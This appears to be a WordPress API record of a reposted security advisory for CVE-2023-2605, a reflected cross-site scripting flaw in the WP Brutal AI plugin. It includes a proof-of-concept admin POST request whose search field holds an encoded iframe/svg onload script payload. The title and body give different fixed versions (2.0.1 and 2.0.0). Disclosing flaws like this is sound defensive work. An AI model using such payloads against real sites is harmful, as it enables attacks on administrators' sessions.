{"id":45594,"date":"2023-07-25T19:10:12","date_gmt":"2023-07-25T15:10:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173734\/wpbrutalai2x-xss.txt"},"modified":"2023-07-28T00:18:08","modified_gmt":"2023-07-27T19:48:08","slug":"wordpress-wp-brutal-ai-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-wp-brutal-ai-cross-site-scripting\/","title":{"rendered":"WordPress WP Brutal AI Cross Site Scripting"},"content":{"rendered":"<p>Title:<br \/>\nWordPress Plugin WP Brutal AI &lt; 2.0.1 &#8211; Admin + Reflected XSS<\/p>\n<p>References:<br \/>\nCVE-2023-2605<\/p>\n<p>Author:<br \/>\nTaurus Omar<\/p>\n<p>Description:<br \/>\nThe plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against logged-in high-privilege users such as admins.<\/p>\n<p>Affected Plugin:<br \/>\nWP Brutal AI - Fixed in version 2.0.0<\/p>\n<p>Proof of Concept:<\/p>\n<p>Send an HTTP request with the following:<\/p>\n<pre><code>POST https:\/\/example.com\/wp-admin\/admin.php?page=viewwpbrutalaicampaign&amp;id=1 HTTP\/1.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 86\nCookie: [Admin+]\n\nsearch=%22%3E%27%3E%3Ciframe+src%3D%22%3Csvg+onload%3Dalert%281%29%3B%3E%22%3E&amp;status=\n<\/code><\/pre>\n<p>Classification:<br \/>\nType: XSS<br \/>\nOWASP Top 10 A7: Cross-Site Scripting (XSS)<br \/>\nCWE-79<\/p>\n<p>WPScan:<br \/>\nhttps:\/\/wpscan.com\/vulnerability\/372cb940-71ba-4d19-b35a-ab15f8c2fdeb<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Title: WordPress Plugin WP Brutal AI &lt; 2.0.1 &#8211; Admin + Reflected XSS References: CVE-2023-2605 Author: Taurus Omar Description: The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against logged-in high-privilege users such as admins. &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45594","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45594","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45594"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45594\/revisions"}],"predecessor-version":[{"id":45715,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45594\/revisions\/45715"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45594"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45594"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45594"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}